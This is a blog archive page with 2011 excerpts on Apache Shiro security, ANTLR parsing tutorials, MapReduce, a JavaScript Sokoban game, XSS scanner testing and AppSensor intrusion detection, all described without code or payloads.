Sunday, December 4, 2011

Apache Shiro Part 3 - Cryptography

Besides securing web pages and managing access rights Apache Shiro does also basic cryptography tasks. The framework is able to:
  • encrypt and decrypt data,
  • hash data,
  • generate random numbers.

Shiro does not implement any cryptography algorithms. All calculations are delegated to Java Cryptography Extension (JCE) API. The main benefit of using Shiro instead of what is already present in Java is ease of use and secure defaults. Shiro crypto module is written in higher abstraction level and by default implements all known best practices.

Thursday, November 10, 2011

Project Report - JSSokoban

I have never worked on bigger JavaScript project and I have never worked with 3D. And I never wrote a game. Better late than never, I will create 3D game in JavaScript. The whole project is less ambitious than it sounds, I will create a Sokoban clone.

Sokoban is a turn-based puzzle with simple rules and graphics. The player navigates a little robot through a warehouse. The warehouse contains walls, wooden boxes and destinations.
Click to Play. Works in Firefox, Opera and Chrome. It is somewhat faster in Chrome.

Tuesday, October 25, 2011

MapReduce Questions and Answers

With all the hype and buzz surrounding NoSQL, I decided to have a look at it. I quickly found that there is not one NoSQL I could learn. Rather, there are various different solutions with different purposes and trade offs. Those various solutions tend to have one thing in common: processing of data in NoSQL storage is usually done using MapReduce framework.

Search on MapReduce found various scattered blog posts, some universities courses pages and one book that seems to contain almost everything other sources did.

This post contains MapReduce questions and answers based on the book. Basically, if I would be a student, this is what I would have made as a test preparation notes. If I would be a teacher, this is what I would ask on the exam.

Thursday, September 29, 2011

ANTLR Tutorial - Expression Language

ANTLR tool is useful any time you need to create compiler, interpreter or parser of your own language. It takes so called grammar file as an input and generates two classes: lexer and parser.

This post explains what is lexer, what is parser and how to write grammar files to generate them. In the end of the post, you will be able to create a compiler into abstract syntax tree for any simple programming language.

Our example project, a boolean expression language, is written in Java and available on Github. Besides that, everything explained in this post is language independent. Grammar files are the same in all languages.

Friday, August 26, 2011

ANTLR Tutorial - Hello Word

Antlr stands for ANother Tool for Language Recognition. The tool is able to generate compiler or interpreter for any computer language. Besides obvious use, e.g. need to parse a real 'big' programming language such as Java, PHP or SQL, it can help with smaller, more common tasks.

It is useful any time you need to evaluate expressions unknown at compile-time or to parse non-trivial user input or files in a weird format. Of course, it is possible to create custom hand made parser for any of these tasks. However, it usually takes much more time and effort. A little knowledge of a good parser generator may turn these time-consuming tasks into easy and fast exercises.

Wednesday, July 20, 2011

Testing for XSS Vulnerabilities - Choosing a Scanner

We have decided to introduce testing for security vulnerabilities into web application development. Previous part introduced cross site scripting, our web application and expectations we have for this project.

In this part, we go through all penetration testing tools we could find. Our goal is to find a suitable open source scanner. We wrote mini review of each found tool and picked up two scanners we will use.

Thursday, June 30, 2011

Testing for XSS Vulnerabilities - Introduction

Cross site scripting (XSS) is second most popular type of attack on web application. It allows attackers to execute scripts in victim’s browser and perform almost any action on users behalf. For example, script may hijack sessions or redirect the user to malicious sites.

This type of attack is relatively easy to perform and difficult to protect against. There are numerous different attack vectors and attacker needs only some knowledge of web technologies (JavaScript, CSS, HTML) to perform any of them. Moreover, one vulnerable place is enough to make whole application vulnerable.

This series of posts introduces XSS testing to a fictional development team working on a web project. The introduction describes both cross site scripting and fictional project requirements.

Monday, May 30, 2011

AppSensor - Intrusion Detection

Imagine that you have created a nice web application and secured it to your best. Users came, used it and everything was OK until someone stumbled upon vulnerability in your application and used it. Of course, you analyzed logs and found that the bad guy was looking for the vulnerability for weeks until he found one.

Creators of AppSensor intrusion detection framework believe that the above situation should not happen. The application should not just lie there and let itself beat with SQL injections, XSS attacks and whatever else. It should take active measures to protect itself. As the average attacker has to make several attempts to find the vulnerability in the application, it should by possible to detect hacking attempts.

AppSensor - Integration with Shiro

AppSensor is intrusion detection framework described in an another post. Out of the box version assumes that underlying application supports ESAPI interfaces. In this post, we will take an application secured by Shiro framework which does not support ESAPI and integrate it with AppSensor.

This post is only about integration. It does not show how to add AppSensor to the application, nor what it is, nor how to use it. All that can be found in AppSensor - Intrusion Detection post.

Monday, April 18, 2011

Apache Shiro Part 2 - Realms, Database and PGP Certificates

This is second part of series dedicated to Apache Shiro. We started previous part with simple unsecured web application. When we finished, the application had basic authentication and authorization. Users could log in and log out. All web pages and buttons had access rights assigned and enforced. Both authorization and authentication data have been stored in static configuration file.

As we promised in the end of last part, we will move user account data to database. In addition, we will give users an option to authenticate themselves via PGP certificates. As a result, our application will have multiple alternative log in options: log in with user name/password and log in with certificate. We will finish by turning alternative log in options mandatory.

Sunday, March 27, 2011

Apache Shiro Part 1 - Basics

Apache Shiro, originally called JSecurity, is Java security framework. It was accepted and became Apache top level project in 2010. It aims to be powerful and easy to be used.

The project is in active development with active both users and developers mailing lists. Most important areas are documented on its web page. However, it has lot of gaps in documentation. It is not possible to learn to use most Shiro features from documentation alone. Luckily, the code is well commented and where I tried it was also easily readable.

Main Shiro features are:
  • authentication,
  • authorization,
  • cryptography,
  • session management.

In this article article we try and demonstrate various Shiro features. We start with simple unsecured web application, then we add security features into it.  All code code is available in SimpleShiroSecuredApplication project on Github.